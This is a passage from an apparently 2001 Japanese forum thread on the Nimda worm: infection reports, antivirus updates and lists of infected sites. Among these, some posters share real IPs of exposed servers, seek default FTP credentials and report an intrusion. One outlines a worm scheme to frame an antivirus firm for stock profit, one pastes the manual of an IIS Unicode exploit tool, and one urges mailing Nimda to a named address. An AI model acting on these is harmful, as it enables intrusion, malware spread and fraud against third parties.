画像もちゃんと表示される。
ρ(^-^)ここにいくと
www.takara-univ.ac.jp
↓
202.223.228.2
を見て、
↓
Exchange.takara-univ.ac.jp
にすぐ飛ばされる。画像が表示されない。
ρ(^-^)ここにいくと
202.223.228.9
画像が表示されない。
なんか設定まちがってない?(^^;
あれ?今www.takara-univ.ac.jpに行くと・・・?
めちゃくちゃだぁΣ<(゜▽゜;)>
0759名無しさん@お腹いっぱい。
NGNG日本じゃ無理だな・・・
0760名無しさん@お腹いっぱい。
NGNGどうみても自分の使ってるCATV屋の、他のユーザーからの攻撃がくるのよ・・。
0761名無しさん@お腹いっぱい。
NGNGなぜ貴方はそう思ふのか
0762名無しさん@お腹いっぱい。
NGNGhttp://people.site.ne.jp/2001/2001.html
0763名無しさん@お腹いっぱい。
NGNGhttp://www.conet-nagano.gr.jp/
0764名無しさん@お腹いっぱい。
NGNGその後Webを見ていたら、
3回もノートンでNimdaが検出された。
SP2にアップグレードしただけじゃ、対策にならないのかなぁ
0765名無しさん@お腹いっぱい。
NGNGのヘッダIIS/3.0?
HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Thu, 27 Sep 2001 **:**:** GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 18 Sep 2001 00:32:00 GMT
Content-Length: 26923
202.223.228.9
のヘッダ一応Apache
HTTP/1.1 302 Found
Date: Thu, 27 Sep 2001 **:**:** GMT
Server: Apache/1.3.12 Cobalt (Unix) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.1pl2 mod_auth_pam/1.0a FrontPage/4.0.4.3 mod_perl/1.24
Location: http://exchange.takara-univ.ac.jp/
Connection: close
Content-Type: text/html; charset=iso-8859-1
0766名無しさん@お腹いっぱい。
NGNGLaBreaってなんか面白そうだね。
0767名無しさん@お腹いっぱい。
NGNGServer: Apache/1.3.12 Cobalt (Unix)
202.223.228.9
は画像が出ないよね。
つまりあれかい、Cobalt Qubeに移そうとして挫折してる、と(^^;
0768名無しさん@お腹いっぱい。
NGNGんだなや。だれかWinに移植してくれんかのう。
0769名無しさん@お腹いっぱい。
NGNGインストールしたよ。でもまだ1匹も捕まえてない。
最近アクセスも少ないし。。。。
0770名無しさん@お腹いっぱい。
NGNG入れたさ(´。`;)
http://211.11.222.51/
ここ行ったさ。
だまってダウンロードしちゃうさ┐(´ー`)┌
0771名無しさん@お腹いっぱい。
NGNG挫折というか放置というかデフォ状態って感じ。
ついでにFTP,TELNET共外部からのアクセスを許可してる。
メルサバも第三者中継許可してるんじゃないだろうな。アフォー
0772名無しさん@お腹いっぱい。
NGNGhttp://www.d-link.co.jp/
ソースもみてね。
0773名無しさん@お腹いっぱい。
NGNGftp://202.223.228.9/
ホントだ! こばるとのftpのデフォルトアカウントってなんだっけ?(ぉぃ
0774名無しさん@お腹いっぱい。
NGNGつまり、宝塚造形芸術大学 短期大学部によって
875 :追加 :01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。
は証明されたと・・(´。`;)
0775名無しさん@お腹いっぱい。
NGNGぜひ試してみてくださいm(_ _)m
---
>>643
>>641
> というか、それ狙ってくる。
あ、それってこれと関係あります?
158 名前:ん〜ま 投稿日:01/09/20 23:31
linuxなのだが試しに、ダミーのroot.exeとか置いたらアクセスが増えてしまったw
0776名無しさん@お腹いっぱい。
NGNGTelnet://202.223.228.9
あははははは、あは、あは、あは・・・。
0777名無しさん@お腹いっぱい。
NGNGte○net://210.151.237.34
ぷっ。ひでー
0778ワーム作って金持ちになる方法
NGNG↓
そのわくちん屋の名前が含まれたワームをばらまく
↓
わくちん屋の株 暴落
↓
株を買い戻して大儲け!
名前でなくて、その会社の持っているIPアドレスとを「攻撃し
ないアドレス」として仕込んだ方がそれっぽいかもね。ワーム
を解析して行くうちに「なんだこりゃ」という騒ぎになるよう
に計算して作る。
わくちん屋が「俺じゃない」と言っても「調査研究の為にワー
ムを作っているうちに、間違って流出させてしらんぷり」と思
われて、簡単に容疑は晴れない。必死に言い訳するほど逆効果。
わくちん屋じゃなくても、同じことはできるけどね。わくちん
屋をターゲットにするのが一番効果的。
新発見のセキュリティーホールを公開するのと同じ理屈で書い
てみたよ。関係者のみなさんは「犯人は俺じゃない」と言うた
めにはどしたらよいか、今のうちに考えておいてね。
0779名無しさん@お腹いっぱい。
NGNGおいおい(w
0780名無しさん@お腹いっぱい。
NGNG侵入成功
0781名無しさん@お腹いっぱい。
NGNGこれって・・。
0782
NGNG試しちゃったじゃねーか (゚д゚)マズー
0783おいおい
NGNGhttp://www.asahi.com/national/update/0927/019.html
0784名無しさん@お腹いっぱい。
NGNGPとD見間違えてるぞ。メガネかけろ。
0785名無しさん@お腹いっぱい。
NGNGいやその前にこうなる。キーワードは「煮ちゃんねる」(w
http://www.asahi.com/tech/feature/K2001092300440.html
0786783
NGNGPとかDとか細かいことは気にすんな。
0787名無しさん@お腹いっぱい。
NGNG0788名無しさん@お腹いっぱい。
NGNGそれはあるなー。
実際、海外のIPだの、 .com .net だのがたたけない会社、知ってる(^^;
0789名無しさん@お腹いっぱい。
NGNGやばそうだからuninstallしようと思ったらできないよ、これ。
仕方がないから、IE6を標準構成でinstallしようと思ったら、ディスク容量がたらんっていわれたよ。
しゃーないから、ディスク整理して、キャパ空けたよ。んで、installしたよ。
で、すぐにoutlookをuninstallしたけど、大丈夫なんだろうか?
その他諸々の付属品もuninstallしたいけど、どーなんだろ、これ。
0790名無しさん@お腹いっぱい。
NGNGhttp://wtc.trendmicro.com/wtc/report.html
痛い。全体的には減っているが昨日に比べてアジア(ニッポソ)のアタックだけが増加中。
何事も遅いニッポソ。
0791名無しさん@お腹いっぱい。
NGNG不要なパケットを垂れ流して放置してるやつこそ社会の敵だ。
0792名無しさん@お腹いっぱい。
NGNG法律勉強したいなぁ。
0793名無しさん@お腹いっぱい。
NGNG金銭的や、物的、社会的損害を受けない限り頼んでも警察なんて動いてくれないよ(´Д`)
0794名無しさん@お腹いっぱい。
NGNG0795名無しさん@お腹いっぱい。
NGNG0796名無しさん@お腹いっぱい。
NGNG0797名無しさん@お腹いっぱい。
NGNGニムダの検出は現在日本が世界一だ・・。
0798名無しさん@お腹いっぱい。
NGNGhttp://headlines.yahoo.co.jp/hl?a=20010927-00000023-mai-bus_all
<ソニー銀行>システムに障害 口座サイトにログインできず
同行はサーバーの一部に障害が発生したと説明しているが、原因は判明していない。
0799名無しさん@お腹いっぱい。
NGNGServerだけじゃなくてProにも使えるよん。
http://www.port139.co.jp/ntsec_hotfix.htm
0800名無しさん@お腹いっぱい。
NGNG0801名無しさん@お腹いっぱい。
NGNGremoteからshutdownできるの?できればスクリプトきぼんぬ
0802名無しさん@お腹いっぱい。
NGNG>>797
っていうか、それトレンドマイクロのオンライン・ウィルス・スキャンや製品
で発見された数がベースでしょ。
トレンドマイクロの主要市場が日本と台湾、北米なんだから、そこに偏っ
て当然と思われ。
それともトレンドマイクロがマカフィやシマンテックみたく、アメリカの会社
と信じてたの?
0803名無しさん@お腹いっぱい。
NGNGうんにゃ。18日ごろは北米のほうが遙かに多かったのだ。
0804名無しさん@お腹いっぱい。
NGNG0805(==)
NGNG安置ういるすインストに、オンライン登録も含む、、だったのでし
だから、める設定がさきになってんだ〜。
ま、先にIEupdateしとっから、ここまできぃつけんでもええかとは思ったんだが
気分の問題(w
0806名無しさん@お腹いっぱい。
NGNGwww.antivirus.com/download/pattern.asp
で最新版のパターンをDLしてくれば登録しなくても平気だよ。
検索エンジンのアップデートは、
www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm
0808名無しさん@お腹いっぱい。
NGNG日本で対策が遅れているのは、21日にIPAが収束宣言を出したため。
http://www.mainichi.co.jp/digital/netfile/archive/200109/21-1.html
IPAは「届け件数の伸びから考えると被害は収束する方向にある」と分析している。
IPAによると、18日深夜に確認されたニムダが初めてIPAに届け出があったのは19日。初日は19件
(午後4時30分時点)、翌20日は65件(同)だった。今年7月に全国的に被害の遭った「サーカム」
は11日間で700件を超えたケースと比較すると被害は少ないと見ている。
0809名無しさん@お腹いっぱい。
NGNGおおお、漏れもそう思う。激しく同意!>日本で対策が遅れているのは
0810名無しさん@お腹いっぱい。
NGNGつかこれ、最新パターンにならないやん>とれんどマイ糞
0811名無しさん@お腹いっぱい。
NGNGまだこんなのあるしな。
http://211.11.222.51/
0812名無しさん@お腹いっぱい。
NGNGっていうか何台もいちいち電話かけてつなげにいくの大変なんだけど‥‥。
SP2のが付いる雑誌情報きぼんぬ。
月刊ヤフーみたいのとNetなんとか(ナビ?)って雑誌はチェック済み
(両方10月号)
0813名無しさん@お腹いっぱい。
NGNG雑誌社に責任を問おう
0814名無しさん@お腹いっぱい。
NGNG新規で買わずに、体験版で十分。
内容は同じで、シリアル番号を入力するかしないかの違い。
体験版では新しいパターンに更新できないようになってるが、806から
ダウンロードすれば更新できる。
更新方法については、
//inet.trendmicro.co.jp/contents/download/ptnupdate.txt
を参照のこと。
0815名無しさん@お腹いっぱい。
NGNG>っていうか何台もいちいち電話かけてつなげにいくの大変なんだけど‥‥。
????????
0816名無しさん@お腹いっぱい。
NGNGhttp://www.takara-univ.ac.jp/
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.sg-jc.ac.jp/
http://www.advaoptical.co.jp/
http://www.computools.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/
このへんが復活したらどうなるんだろう。 嵐が収まったから玄関あけよう、みたいなところも多いような・・。
こんなとこもあるし。
http://pc2.autechs-unet.ocn.ne.jp
10月再開って、なんか目途があるんだろうか。
http://www.with9.com/
0817名無しさん@お腹いっぱい。
NGNGセットアップフォルダピーコしろよ…
0818名無しさん@お腹いっぱい。
NGNGんだから806に置いてるパターンがすでに古いやん>とれんどマイ糞
0819名無しさん@お腹いっぱい。
NGNGVOTE喰らって氏ね。
0820名無しさん@お腹いっぱい。
NGNGhttp://www.antivirus.com/download/pattern.asp
デッドリンク
http://www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm
パターン古い
806はネタ
0821ScriptKiddddy
NGNG[XXExploit ]
・・is a program that will search for the Uni Code Exploit
In Microsoft IIS servers.
If the exploit is found, the program will then attempt to connect giving you
the right to execute DOS commands.
も一つ。
[IISXXXXX]
・・・・
Now press the "Query Server" button and then the program will do some
magics and show you the name of the server that is running on that machine.
look at the status screen. If you see Microsoft-IIS 4.0 or IIS 5.0 this is
good , then it will tell you can the server be exploited or not.
Go to "Upload Files" Tab, the first object is "Remote Dir"
this means where files must be upoaded to ( the Path to it on
the victims computer ).
Directory Listing
-----------------
3. Here is not many things to explain, you just need to write the path that you
want to check for files at the "Directory" stirig , and it will show you the files
that located on that path. Example : C:\winnt will show you all the files and
directories that located at the Windows NT folder. If you need to list files in long name
dirs you can use dos style like: c:\progra~1\common\ (c:\program files\common\) or
you can put all the path in brakets (" ") like: "c:\program files\common"
Now we go forward and study how to searh for files.
It's easy just after dir path enter + and /S parameter.
For example this command: "c:\CCs\*.mdb+/S" will search for all *.mdb files
in c:\CCs\ directory. Including all sub directories.
* If you will search for c:\*.* - it will give you all files and their path in c:\
* Such search method is slow (dependin on server speed)
* Dont Forget to click "List Files" button . =)
- This software is provided "AS IS", and you, its
user, assume the entire risk as to its quality and
accuracy.
0822名無しさん@お腹いっぱい。
NGNGどうみても自分の使ってるCATV屋の、他のユーザーからの攻撃がくるのよ・・。
>>761
> なぜ貴方はそう思ふのか
24.19.79.215
こやつがポートスキャンしてくるのだが、
@Home Network (NETBLK-ATHOME) ATHOME 24.0.0.0 - 24.23.255.255
@Home Network (NETBLK-BB1-RDC2-TX-11) BB1-RDC2-TX-11 24.19.64.0 - 24.19.79.255
これは、うちのプロバイダー(ケーブルテレビ屋)なのだ。
0823名無しさん@お腹いっぱい。
NGNG0824>
NGNGここの問題のページはなくなって
"セキュリティー確保の為、しばらく落札情報は停止いたします。ご了承ください。"
だって。。
騒動が収まることがセキュ確保と思ってないことを祈る!
0825名無しさん@お腹いっぱい。
NGNGここにニムダが紛れ込んでいたのも、
http://www.hyundaijapan.co.jp/
>>ウリナラの仕業だニムダ!
0826名無しさん@お腹いっぱい。
NGNGうゎ〜ん。ニムダに感染しちゃったよー。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
Λ_Λ
( ゜∀⊂ヽ ニヤリ
⊂ ノ
人 Y
し (_)
0827名無しさん@お腹いっぱい。
NGNG∧∧
<`∀´>
≡
/\≡/\
│
0828名無しさん@お腹いっぱい。
NGNGhttp://www.takara-univ.ac.jp/
http://202.223.228.5
閉鎖中
http://Exchange.takara-univ.ac.jp
http://202.223.228.9
画像なしの不完全表示
http://202.223.228.4
正常表示
Telnet://202.223.228.9
(ぉ
ftp://202.223.228.9/
(ぅ
以上、今朝の宝塚造形芸術大学 短期大学部
http://www.hyundaijapan.co.jp/ は正常復旧したものとみて観察終了
0829名無しさん
NGNG>http://211.11.222.51/
これ、なに?
http://www.oishiine.co.jp/
は直ってるみたいだけど…
0830名無しさん@お腹いっぱい。
NGNGhttp://www.oishiine.com
これと関連はあるのか?
0831名無しさん@お腹いっぱい。
NGNG対策されたみたいだね。
かわりにこれとか。
http://www.bee.woodland.co.jp
0832名無しさん@お腹いっぱい。
NGNGttp://www.zdnet.co.jp/news/0109/28/e_nimda.html
0833名無しさん@お腹いっぱい。
NGNG ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
Λ_Λ
( ゜∀⊂ヽ ニヤリ
⊂ ノ
人 Y
し (_)
http://www.zdnet.co.jp/news/0109/28/e_nimda.html
0834名無しさん@お腹いっぱい。
NGNGお気楽管理者としては自分のマシンからのポートスキャンとかが検知できて、くい止めたり告知するようなのがほしいだろうねぇ。
中小企業でも買える1万円以下の。
0835名無しさん@お腹いっぱい。
NGNGが、ノートンはきょう昼ごろまた新しくなっていた(@@〜☆
0836ななしさん
NGNG中国一号って名前けっこう気に入った。
でもなんで一号?
ところでnimdaってのは発見者がつけた名前なの?adminの逆というのは
あちこちに書いてあるけど、なんでこうしたと書いてあるところ
が見つからない。
0837名無しさん@お腹いっぱい。
NGNGきょうで、ニムダ関連の各種緊急配布を終了するところが多いらしい。
お試し版の入手を検討しているひとはおはやめに。
https://www.netsecurity.ne.jp/article/1/2908.html
http://www.symantec.co.jp/region/jp/sarcj/defs.download.html
(最新に更新前)
http://www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm
(すでにふるい)
0838やまもとたかお
NGNG0839名無しさん@お腹いっぱい。
NGNG我社の特徴
ttp://www.sano-mfg.co.jp/tokucyo/tokuchou.htm
0840
NGNG0841名無しさん@お腹いっぱい。
NGNGわーい。再感染者爆発だー。
0842名無しさん@お腹いっぱい。
NGNGまじ?攻撃してきた鯖のIP公開されたし。
0843名無しさん@お腹いっぱい。
NGNGわーい
http://japan.cnet.com/News/2001/Item/010928-2.html?mn
0844名無しさん@お腹いっぱい。
NGNG08451
NGNGhttp://www.f2.dion.ne.jp/~impact14/
0846名無しさん@お腹いっぱい。
NGNGひまだねえ。
つーかageのあとに「その画像ならココ」もないもんだが。
しかし、いつもそのあとにすぐフォロー入れる漏れもヒマだねぇ・・。
0847名無しさん@お腹いっぱい。
NGNGリンク色変わってるしな σ(--;
0848名無しさん@お腹いっぱい。
NGNGmailto:k-b-homepage@wit.ne.jp
未対策、感染放置、ひどいもんだ。
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 28 Sep 2001 **:**:** GMT
Content-Type: text/html
Set-Cookie: ********************=************************; path=/
Cache-control: private
0849名無しさん@お腹いっぱい。
NGNGニムダ活動再開か??
他に同じ人いる? インターネットつながらないからダイアルアップ
でつないでるんだけど
0850名無しさん@お腹いっぱい。
NGNGつまり、だれも管理してない、ってことなんだろうか・・・。
>近畿文化体系策定協議会内 実行委員会
まあそうなんだろうな(--;
0851名無しさん@お腹いっぱい。
NGNGらすとあっぷでーと 2001/2/19(MON)
( ̄△ ̄;
0852名無しさん@お腹いっぱい。
NGNGMSNが感染したのが18日の午後11時ごろ。
そんなに早く感染したヒトいるのかなぁ。
単なる駆除もれと思われ。
0853名無しさん@お腹いっぱい。
NGNGダイヤルアップはつながった。
0854名無しさん@お腹いっぱい。
NGNGttp://www.clubtgp.com/freehosting/teeny/kat/index.htm
0855849
NGNG今まで静かだったのに、やっぱり一斉に80ポートへの攻撃始まってるぅ。
駆除漏れか?駆逐したと思うが、漏れてたのか。鬱だ氏脳
http://www.zdnet.co.jp/news/0109/28/e_nimda.html
http://japan.cnet.com/News/2001/Item/010928-2.html
10日後、活動開始と書いてるが、時間的には少し早い気もするしなぁ。。
0856名無しさん@お腹いっぱい。
NGNGむ?10日後って、感染240時間後ってことじゃなくて、アメリカ時間の10日後ってことか!?
てことはええと日本の夜11時が、東部時間でたしか朝7時だったよな?
もう今、圏内じゃんΣ<(゜▽゜;)>
0857名無しさん@お腹いっぱい。
NGNG休止してないんだから再開もクソもねーよ。
ふざけるな。
0858名無しさん@お腹いっぱい。
NGNG時間差で感染してるんでしょう。ご愁傷summer.
0859名無しさん@お腹いっぱい。
NGNGあんた昔CodeRedとか感染しなかった?(w
0860名無しさん@お腹いっぱい。
NGNGはあ?IIS鯖たててないけど。
0861名無しさん@お腹いっぱい。
NGNG漏れはCATV屋の固定IPアドレス2つ持ってるんだけど、一方は先月CodeRedに感染したんだ。IIS搭載のW2k。
もう一方はW98で、こちらは無感染。
駆除後W2kの方に攻撃がやたらきて、一時接続不能になったんで、そっち(感染IP)をW98に、無傷IPをW2kにした(振り直した)んだ。
そしたら18日以降、W98のほう(感染IP)に狂ったようにポート攻撃が来て、昨夜時点でも1時間で4〜5件、そんなカンジ。
が、W2kはIP交換以来(現無傷IP)ポート攻撃は19日の朝1回と、今朝(28日)の2回きり。
これだけちがうのよ(w
あと、>>>>643 も参考にしてね。
0862名無しさん@お腹いっぱい。
NGNGIP的に近所に感染鯖がいるんだyo!
0863名無しさん@お腹いっぱい。
NGNG0864名無しさん@お腹いっぱい。
NGNGアジア方面の割合が半分ぐらいまでに減った。
ニムダはメール攻撃に移行するとパケット攻撃を減らすかしなくなるのかな?
0865名無しさん@お腹いっぱい。
NGNG周辺でさーかむが流行っているのが不気味だ・・。
0866名無しさん@お腹いっぱい。
NGNG日本では以前に比べてえらくJSにむだが増えてるじゃないか・・。
0867名無しさん@お腹いっぱい。
NGNGそりゃ、漏れがカキコで貼りまくってるから。。。板に。
0868名無しさん@お腹いっぱい。
NGNG最近のパターンファイルは流行当時とニムダへの対処がちがうぞ。
アップデートしたものであらためてスキャンしたほうがよいと思われ。
0869名無しさん@お腹いっぱい。
NGNGそれ踏むようなのがVBオンラインスキャンはしないと思われ(w
0870名無しさん@お腹いっぱい。
NGNG放置サイトには何言ってもムダか。
だったらネットワークから切断してもよかろうに。
0871名無しさん@お腹いっぱい。
NGNGいろいろやってシャットダウンに成功しても、翌日そのまま再起動された例もあるぞ。
0872名無しさん@お腹いっぱい。
NGNGどうせねすけかなんかで開発していて、自分ではういるすだうんろーどダイアログも開かんのだろう。
0873
NGNG0874名無しさん@お腹いっぱい。
NGNG感染前の状態に復元されるだけだぞ(w
0875名無しさん@お腹いっぱい。
NGNGなんてコマンドは無いのかね?
0876名無しさん@お腹いっぱい。
NGNG作ってFTPでアプすれば?
0877名無しさん@お腹いっぱい。
NGNG全体が占領されそうだな。
巨大pingを飛ばしまくるワームとか出来て・・・
0878名無しさん@お腹いっぱい。
NGNG復帰してる。
と思ったら202.223.228.4サーバーにDNSを割り当てただけだった(薬
感染マシンは廃棄か?
765 :名無しさん@お腹いっぱい。 :01/09/27 15:29
202.223.228.4
のヘッダIIS/3.0?
HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Thu, 27 Sep 2001 **:**:** GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 18 Sep 2001 00:32:00 GMT
Content-Length: 26923
0879名無しさん@お腹いっぱい。
NGNG2001-09-20 04:03p 667,648 V3nimda.exe
感染マシンで見つけたんだけど。
0880しつもん
NGNG0881名無しさん@お腹いっぱい。
NGNG0882良い子は寝る・・・
NGNG0883名無しさん@お腹いっぱい。
NGNGインストール中ってネットに接続しちゃいけないの?
0884
NGNG0885名無しさん@お腹いっぱい。
NGNG0886名無しさん@お腹いっぱい。
NGNGそれだと永遠に最新版にアップデートできないね(w
いけないってことはないと思うよ。
0887名無しさん@お腹いっぱい。
NGNG>>46から進展はあったのでしょうか。
僕の場合、
OEをはずしている(アンインストールはしていないが
ディレクトリ内のファイルの拡張子をexea、dllaなどに変えている)。
Java、ActivXを切っている。
エクスプローラーのWeb表示を切っている。
これだと感染はしないんですか?
すいません。アンチウイルスソフトが古くて(プレ版マカフィー)、>>811のサイトに行っても
何も警告してくれなかったのもので。
ただ、ダウンロードのダイヤローグとかWMPとかが出てきたりとかはしていません。
0888名無しさん@お腹いっぱい。
NGNG大丈夫。
任意で話聞かれただけだから。
0889名無しさん@お腹いっぱい。
NGNG日付を見てるから、なにかやってると思った。
そうすると感染日から10日って事かな。
時、分、秒などは見ていないようダス。
0890名無しさん@お腹いっぱい。
NGNG> すいません。アンチウイルスソフトが古くて(プレ版マカフィー)、>>811のサイトに行っても
> 何も警告してくれなかったのもので。
そこからきたのかもしれないけど、
http://ton.2ch.net/test/read.cgi?bbs=sec&key=994010282&ls=100
も、チェックね>摩訶フィー ユーザー
0891名無しさん@お腹いっぱい。
NGNGhttp://www.takara-univ.ac.jp/
やっぱりしまってる。夜閉めて朝開くのか?(^^;
0892名無しさん@お腹いっぱい。
NGNGhttp://wtc.trendmicro.com/wtc/
日本の報告数が昨日の4倍になってるぅ(@@〜☆
これはもう、大流行時の数値だぞ。
再発説は本当だったか?
0893名無しさん@お腹いっぱい。
NGNG今は開いてる…
0894名無しさん@お腹いっぱい。
NGNG0895名無しさん@お腹いっぱい。
NGNGそれはそうでしょう。注意を促すファイルを親切につくってやっても
見もしないんだから(w
0896ななし
NGNG何で韓国が 1 で 日本が 11127なんだ!
0897名無しさん@お腹いっぱい。
NGNG前にも違うアドレスでポートスキャンかけてきたのはおまえか?
0898名無しさん@お腹いっぱい。
NGNGワレ大国では、みんなワレのVB持っててもニムダ検知できる最新版のキーが送られてこないのよ(w
0899名無しさん@お腹いっぱい。
NGNG2001-09-29 01:33p 0 TFTP1124
2001-09-29 01:33p 0 TFTP1256
2001-09-29 01:32p 0 TFTP1628
2001-09-29 01:14p 0 TFTP1728
2001-09-29 01:20p 0 TFTP1740
2001-09-29 01:32p 0 TFTP336
2001-09-29 01:05p 0 TFTP460
2001-09-29 01:43p 0 TFTP676
2001-09-29 12:55p 0 TFTP704
2001-09-29 01:31p 0 TFTP720
2001-09-29 01:00p 0 TFTP748
0900
NGNGウイルスバスターの使用記録だから、使用してない地域では当然
少ない。
0901名無しさん@お腹いっぱい。
NGNG0902すぱむスパムSPAM
NGNGReply-To : chantaldenboer2713@excite.com
To : 10bqgh@msn.com
Subject : Got Debt? [ndywg]
Received: from [198.78.9.50] by hotmail.com (3.2) with ESMTP id MHotMail***;
Received: from kkgky.msn.com (212.216.22.67 [212.216.22.67]) by exchange@durdene.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0)id S3MJ4TW0; Thu, 27 Sep 2001 21:47:48 -0400
From dnaxs384a@msn.com Thu, 27 Sep 2001 18:37:39 -0700
−−−−−
mail.durdene.com (pri=1)
<<< 220 exchange@mail.durdene.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from mail2.playsic.com[139.142.205.227]"@mail.durdene.com>
<<< 250 OK - mail from <"TEST http://www.nanet.co.jp/rlytest/ requested from mail2.playsic.com[139.142.205.227]"@mail.durdene.com>
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection
問題あり:不正な中継を受け付けます。
(198.78.9.50)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。
Info@your411ToWin.com
160000001E@mail2.playsic.com
dnaxs384a@msn.com
chantaldenboer2713@excite.com
10bqgh@msn.com
exchange@mail.durdene.com
0903
NGNG台湾はPC使ってる人のレベルが高いのかな?
0904名無しさん@お腹いっぱい。
NGNGでは朝から急上昇して、今でも高い水準だな。
本当に10日後のリターンマッチ機能付きだったのだろうか。
0905名無しさん@お腹いっぱい。
NGNG意識の違いもあると思われ
0906名無しさん@お腹いっぱい。
NGNGいらんのに無理して使ってるヒトは台湾にはいない気がする。
「パソコン『ぐらい』使えないと」なんて言葉は台湾にはない気がする。
そんな気がする。
0907名無しさん@お腹いっぱい。
NGNG今回ここはニムダに関して世界の被害状況やリアルタイムのアタック数を
Coderedの時みたいに表示してくれないのかなー。
その代わりに今はオサマ・ビン・ラディンの写真が拝める。
0908ん〜ま
NGNG0909名無しさん@お腹いっぱい。
NGNG0910名無しさん@お腹いっぱい。
NGNG0911名無しさん@お腹いっぱい。
NGNG0912名無しさん@お腹いっぱい。
NGNGまだどころかこれからもずっと。
今現在も増殖中で、むしろ現在では大勢を占めている。
最低限のセキュリティの話でもガイキチ扱いだもんなー。
たまんないよ。
0913>>
NGNG0914911
NGNG会社関係のやばいファイルがいっぱいあるぞ。
鍵かけずに帰宅するようなもんだ。
0915>911
NGNG自営ドメイン、自前鯖 たてる必要ないんだよね。。
ホスティングの値段どんどんさがってるんだから。。。
どうせ会社紹介程度のWebサイトだろうし。。。
0916>
NGNGここかなり前からだが、、
ウッドランドってプロだろ。なんとかしろよ。。
0917名無しさん@お腹いっぱい。
NGNGInfoSphere (NTT PC Communications, Inc.)
ダイヤルアップかフレッツかADSLユーザーのどれかだろう。
鯖立てているとは夢にも思っていないと思う。
0918名無しさん@お腹いっぱい。
NGNGこいつにNIMDA付きメール送ってやれ(藁
k-b-homepage@wit.ne.jp
0919名無しさん@お腹いっぱい。
NGNGハァー。。。
パソナルファイアウォルで80へのアタークログみて
慌ててる奴の方がまだましという事だね。。
0920名無しさん@お腹いっぱい。
NGNG俺はログ見て楽しんでるが何か?
0921名無しさん@お腹いっぱい。
NGNGログもあんまり見なくなるかもなー。
0922名無しさん@お腹いっぱい。
NGNGその通り
Web立ち上げたい会社は、まず身の程を知れ!!
0923名無しさん@お腹いっぱい。
NGNGhttp://www.zumensoft.co.jp/menu.html
0924名無しさん@お腹いっぱい。
NGNGhttp://www.sg-jc.ac.jp/Alaska/8_30/AC_8_30.html
</DIV>
</BODY>
</HTML>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
0925名無しさん@お腹いっぱい。
NGNG0926911
NGNG同じやつかな?(w おれもADSLだから多分ADSLだと思う
>>917
0928>
NGNG給与奉行が入ってるで、そのデータとか盗まれたり消されたり
しても知らんぞ
0929名無しさん@お腹いっぱい。
NGNG救い様がないな・・・。
0930>
NGNG0931名無しさん@お腹いっぱい。
NGNGそこの掲示板みると、駆除するだけで対策してないみたい。
最低のソフトハウスだな。
0932>
NGNGウッドランド 管理責任ないのかおい
0933>
NGNGreadme.eml ダウンロードのスクリプト残ったままなんだが
汚れてない原本からコンテンツ再ウプってしないものな普通?
0934名無しさん
NGNGZAQの馬鹿ユーザーが晒されてます。
0935死ねって感じ?
NGNG私の周りにもウイルスで泣いている人達が少なからずいます。
彼らにはWIN2000に変えるように進めていますが駆除が出来れば
とりあえずはなんとかなると思います。
私を含めてウイルスに苦しんでいる者に救いの手を。
よろしくお願いいたします。深刻になってごめんなさい
0936名無しさん@お腹いっぱい。
NGNG>>彼らにはWIN2000に変えるように進めていますが
勢いでIISインストールしたり、パッチ忘れたりしないの?
0937ほんと氏ねって感じだよ
NGNGどうやら閉じたかな?
またreadm.eml消して駆除した気にならなければいいけどね。
恐いのはウィルスそのものではなく感染したらどうなるかを知るべし。
0938名無しさん@お腹いっぱい。
NGNGいちおう入れたつもりなくても勝手にIISがインストールされてないか
チェックはしたほうがいいと思う。
>>911 = >>926はその好例だろう。
0939名無しさん@お腹いっぱい。
NGNG外から文句言われなくなったらそれでいい、みたいなところも多いな・・。
0940名無しさん@お腹いっぱい。
NGNGhttp://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
>1週間かけて初期化しましたが、1台は残念ながら初期化に失敗、廃材と変わり果てました。
意味不明なんですけど。。。
0941名無しさん@お腹いっぱい。
NGNGおそらく物質レベルでの初期状態を目指したものの、還元に失敗し単なる廃材となったと思われ。
0942名無しさん@お腹いっぱい。
NGNG>WIN2000は強かった。ウィルスが3000個以上検出されたにもかかわらず、びくともせずに変わりなく動いておりました。
「びくともせずに変わりなく動いて」って、そういう問題じゃないような・・。
0943ツッコミ所満載
NGNGWIN2000は強かった。ウィルスが3000個以上検出されたにも
かかわらず、びくともせずに変わりなく動いておりました。
LANさえなければこのまま使いたかったのですが
0944名無しさん@お腹いっぱい。
NGNG0945しよ〜しゃたん
NGNGイギリスでのウィルス対策できてない人のISP利用を制限するっていう話があったけど、
日本でもやってほしいよ・・・
そうすれば、インターネット上からDQNが大幅にへって嬉しいこと限りなしなのだが。
0946名無しさん@お腹いっぱい。
NGNGでも、何でそこまでしてセキュリティ意識が低いことをアピールしたいのか
あ、失うほどの信頼が無いのか(w
0947名無しさん@お腹いっぱい。
